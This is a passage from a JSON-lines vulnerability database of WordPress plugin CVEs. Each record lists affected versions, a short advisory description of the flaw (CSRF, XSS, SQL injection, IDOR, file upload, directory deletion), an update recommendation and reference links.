version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/security\\\/advisories\\\/GHSA-pqwp-qrp7-grg4\",\"name\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/security\\\/advisories\\\/GHSA-pqwp-qrp7-grg4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/commit\\\/8251c6298a995ccf4f26c43f03ed11a275dd0c5f\",\"name\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/commit\\\/8251c6298a995ccf4f26c43f03ed11a275dd0c5f\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8245","slug":"gamipress-reset-user","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The GamiPress  WordPress plugin before 1.0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fb6292c-502c-481a-8223-ecda03d4c3fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fb6292c-502c-481a-8223-ecda03d4c3fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6719","slug":"offload-videos-bunny-netaws-s3","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The Offload Videos  WordPress plugin before 1.0.1 does not have CSRF check in place when updating its settings, which could allow low privilege users to update them via a CSRF attack","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dc7caac-a36e-4313-a8be-c6b13e564924\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dc7caac-a36e-4313-a8be-c6b13e564924\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7641","slug":"assistant-for-nextgen-gallery","versionImpact":"1.0.0","versionEndExcluding":"1.0.0","description":"The Assistant for NextGEN Gallery plugin for WordPress is vulnerable to arbitrary directory deletion due to insufficient file path validation in the \/wp-json\/nextgenassistant\/v1.0.0\/control REST endpoint in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to delete arbitrary directories on the server, which can cause a complete loss of availability.","refs":"[{\"url\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/assistant-for-nextgen-gallery\\\/trunk\\\/nextgenassistant.php#L163\",\"name\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/assistant-for-nextgen-gallery\\\/trunk\\\/nextgenassistant.php#L163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/assistant-for-nextgen-gallery\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/assistant-for-nextgen-gallery\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07ebb176-a1f8-4a5c-8d81-a83fda4b0af3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07ebb176-a1f8-4a5c-8d81-a83fda4b0af3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0033","slug":"pdf-viewer","versionEndExcluding":"1.0.0","description":"The PDF Viewer WordPress plugin before 1.0.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d9ae43b-75a7-4fcc-bce3-d9e9d7a97ec0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d9ae43b-75a7-4fcc-bce3-d9e9d7a97ec0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5057","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not escape user metadata before outputting them in mentions, which could allow users with a role of Contributor and above to perform Stored XSS attacks","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58a63507-f0fd-46f1-a80c-6b1c41dddcf5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58a63507-f0fd-46f1-a80c-6b1c41dddcf5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3746","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not sanitize and escape some data from post content, which could allow contributor and above role to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c15a6032-6495-47a8-828c-37e55ed9665a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c15a6032-6495-47a8-828c-37e55ed9665a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3707","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not ensure that post contents to be displayed are public and belong to the plugin, allowing any authenticated user, such as subscriber to retrieve the content of arbitrary post (such as draft and private) via an IDOR vector. Password protected posts are not affected by this issue.","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/541bbe4c-3295-4073-901d-763556269f48\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/541bbe4c-3295-4073-901d-763556269f48\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3706","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not ensure that post titles to be displayed are public and belong to the plugin, allowing any authenticated user, such as subscriber to retrieve the title of arbitrary post (such as draft and private) via an IDOR vector","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daa4d93a-f8b1-4809-a18e-8ab63a05de5a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daa4d93a-f8b1-4809-a18e-8ab63a05de5a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0363","slug":"scheduled-announcements-widget","versionEndExcluding":"1.0","description":"The Scheduled Announcements Widget WordPress plugin before 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d332a47-e96c-455b-9e8f-db6dbb59b518\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d332a47-e96c-455b-9e8f-db6dbb59b518\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3605","slug":"wp-hotel-booking","versionImpact":"1","versionEndExcluding":"1","description":"The WP Hotel Booking plugin for WordPress is vulnerable to SQL Injection via the 'room_type' parameter of the \/wphb\/v1\/rooms\/search-rooms REST API endpoint in all versions up to, and including, 2.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5931ad4e-7de3-41ac-b783-f7e58aaef569?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5931ad4e-7de3-41ac-b783-f7e58aaef569?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9707","slug":"hunk-companion","versionImpact":"1","versionEndExcluding":"1","description":"The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation\/activation due to a missing capability check on the \/wp-json\/hc\/v1\/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-hunk-companion\\\/blob\\\/5a3cedc7b3d35d407b210e691c53c6cb400e4051\\\/hunk-companion\\\/import\\\/app\\\/app.php#L46\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-hunk-companion\\\/blob\\\/5a3cedc7b3d35d407b210e691c53c6cb400e4051\\\/hunk-companion\\\/import\\\/app\\\/app.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hunk-companion\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hunk-companion\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166501%40hunk-companion&new=3166501%40hunk-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166501%40hunk-companion&new=3166501%40hunk-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7664","slug":"alpack","versionImpact":"1","versionEndExcluding":"1","description":"The AL Pack plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the check_activate_permission() permission callback for the \/wp-json\/presslearn\/v1\/activate REST API endpoint in all versions up to, and including, 1.0.2. The callback reads the client-supplied Origin header and, after parsing, allows the request if it matches one of the trusted domains, without ever verifying user authentication, capabilities, or nonce tokens. This makes it possible for unauthenticated attackers to activate premium features by simply spoofing the Origin header.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alpack\\\/trunk\\\/includes\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alpack\\\/trunk\\\/includes\\\/api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alpack\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/alpack\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793a2096-3332-412e-a45a-a7367b1209a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793a2096-3332-412e-a45a-a7367b1209a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9020","slug":"list-category-posts","versionImpact":"0.90.2","versionEndExcluding":"0.90.3","description":"The List category posts WordPress plugin before 0.90.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 0.90.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6caa4e5d-8112-4d00-8e97-b41df611a071\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6caa4e5d-8112-4d00-8e97-b41df611a071\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4637","slug":"wpvivid-backuprestore","versionImpact":"0.9.94","versionEndExcluding":"0.9.95","description":"The WPvivid plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the restore() and get_restore_progress() function in versions up to, and including, 0.9.94. This makes it possible for unauthenticated attackers to invoke these functions and obtain full file paths if they have access to a back-up ID.","recommendation":"Update to version 0.9.95, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0bd6b-9c88-4d31-90b5-92d3ceb8c0af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0bd6b-9c88-4d31-90b5-92d3ceb8c0af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3943\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3736\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php#L3736\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023214\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php?contextall=1&old=3007861&old_path=%2Fwpvivid-backuprestore%2Ftrunk%2Fincludes%2Fclass-wpvivid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023214\\\/wpvivid-backuprestore\\\/trunk\\\/includes\\\/class-wpvivid.php?contextall=1&old=3007861&old_path=%2Fwpvivid-backuprestore%2Ftrunk%2Fincludes%2Fclass-wpvivid.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12153","slug":"gdy-modular-content","versionImpact":"0.9.92","versionEndExcluding":"0.9.93","description":"The GDY Modular Content plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.9.91. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.9.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdy-modular-content\\\/trunk\\\/includes\\\/elements.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdy-modular-content\\\/trunk\\\/includes\\\/elements.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f854737-e87b-4c50-a9fb-d3b129f9d9fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f854737-e87b-4c50-a9fb-d3b129f9d9fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5121","slug":"wpvivid-backuprestore","versionImpact":"0.9.89","versionEndExcluding":"0.9.90","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings (the backup path parameter) in versions up to, and including, 0.9.89 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 0.9.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdcac5f9-a744-4853-8a80-ed38fec81dbb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdcac5f9-a744-4853-8a80-ed38fec81dbb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5120","slug":"wpvivid-backuprestore","versionImpact":"0.9.89","versionEndExcluding":"0.9.90","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image file path parameter in versions up to, and including, 0.9.89 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.9.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/320f4260-20c2-4f27-91ba-d2488b417f62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/320f4260-20c2-4f27-91ba-d2488b417f62?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/upload-cleaner\\\/class-wpvivid-uploads-cleaner.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/upload-cleaner\\\/class-wpvivid-uploads-cleaner.php#L161\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4274","slug":"wpvivid-backuprestore","versionImpact":"0.9.89","versionEndExcluding":"0.9.90","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 0.9.89. This allows authenticated attackers with administrative privileges to delete the contents of arbitrary directories on the server, which can be a critical issue in shared environments.","recommendation":"Update to version 0.9.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/class-wpvivid-setting.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpvivid-backuprestore\\\/tags\\\/0.9.89\\\/includes\\\/class-wpvivid-setting.php#L200\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2956458%40wpvivid-backuprestore%2Ftrunk&old=2948265%40wpvivid-backuprestore%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d94f38f-4b52-4b0d-800c-a6fca40bda3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d94f38f-4b52-4b0d-800c-a6fca40bda3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0143","slug":"send-pdf-for-contact-form-7","versionEndExcluding":"0.9.9.2","description":"The Send PDF for Contact Form 7 WordPress plugin before 0.9.9.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4cd3d98-9678-49cb-9d1a-551ef8a810b9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4cd3d98-9678-49cb-9d1a-551ef8a810b9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4209","slug":"poeditor","versionEndExcluding":"0.9.8","description":"The POEditor WordPress plugin before 0.9.8 does not have CSRF checks in various places, which could allow attackers to make logged in admins perform unwanted actions, such as reset the plugin's settings and update its API key via CSRF attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2c6fa7d-1b0f-444b-8ca5-8c1c06cea1d9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2c6fa7d-1b0f-444b-8ca5-8c1c06cea1d9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2007-10003","slug":"the-hackers-diet","versionImpact":"0.9.6b","versionEndExcluding":"0.9.7b","description":"A vulnerability, which was classified as critical, has been found in The Hackers Diet Plugin up to 0.9.6b on WordPress. This issue affects some unknown processing of the file ajax_blurb.php of the component HTTP POST Request Handler. The manipulation of the argument user leads to sql injection. The attack may be initiated remotely. Upgrading to version 0.9.7b is able to address this issue. The patch is named 7dd8acf7cd8442609840037121074425d363b694. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-243803.","recommendation":"Update to version 0.9.7b, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.243803\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.243803\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.243803\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.243803\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/releases\\\/tag\\\/0.9.7b\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/releases\\\/tag\\\/0.9.7b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/commit\\\/7dd8acf7cd8442609840037121074425d363b694\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/the-hackers-diet\\\/commit\\\/7dd8acf7cd8442609840037121074425d363b694\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7620","slug":"customizer-export-import","versionImpact":"0.9.7","versionEndExcluding":"0.9.7.1","description":"The Customizer Export\/Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the '_import' function in all versions up to, and including, 0.9.7. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: This vulnerability is only exploitable when used in conjunction with a race condition as the uploaded file is deleted shortly after it is created.","recommendation":"Update to version 0.9.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7600e7df-725d-4877-b0bf-5329f814723f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7600e7df-725d-4877-b0bf-5329f814723f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144365\\\/customizer-export-import\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144365\\\/customizer-export-import\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10108","slug":"inline-google-spreadsheet-viewer","versionImpact":"0.9.6","versionEndExcluding":"0.9.6.1","description":"A vulnerability was found in meitar Inline Google Spreadsheet Viewer Plugin up to 0.9.6 on WordPress and classified as problematic. Affected by this issue is the function displayShortcode of the file inline-gdocs-viewer.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 0.9.6.1 is able to address this issue. The name of the patch is 2a8057df8ca30adc859cecbe5cad21ac28c5b747. It is recommended to upgrade the affected component. VDB-230234 is the identifier assigned to this vulnerability.","recommendation":"Update to version 0.9.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/releases\\\/tag\\\/0.9.6.1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/releases\\\/tag\\\/0.9.6.1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230234\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230234\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230234\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230234\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/commit\\\/2a8057df8ca30adc859cecbe5cad21ac28c5b747\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/inline-google-spreadsheet-viewer\\\/commit\\\/2a8057df8ca30adc859cecbe5cad21ac28c5b747\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1347","slug":"customizer-export-import","versionEndExcluding":"0.9.6","description":"The Customizer Export\/Import WordPress plugin before 0.9.6 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356a5977-c90c-4fc6-98ed-032d5b27f272\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/356a5977-c90c-4fc6-98ed-032d5b27f272\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24870","slug":"wp-fastest-cache","versionEndExcluding":"0.9.5","description":"The WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some of the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload","recommendation":"Update to version 0.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48de63ab-2ef1-4469-8fc4-9346068bdf06\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48de63ab-2ef1-4469-8fc4-9346068bdf06\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24869","slug":"wp-fastest-cache","versionEndExcluding":"0.9.5","description":"The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber","recommendation":"Update to version 0.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2233795-1a32-45fc-9d51-b6bd0a073f5b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2233795-1a32-45fc-9d51-b6bd0a073f5b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/2021\\\/10\\\/14\\\/multiple-vulnerabilities-in-wp-fastest-cache-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4682","slug":"lightbox-gallery","versionEndExcluding":"0.9.5","description":"The Lightbox Gallery WordPress plugin before 0.9.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fc92954-20cf-4563-806e-e7a8e5ccfc72\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fc92954-20cf-4563-806e-e7a8e5ccfc72\",\"refsource\":\"MISC\",\"tags\":[]}]"}
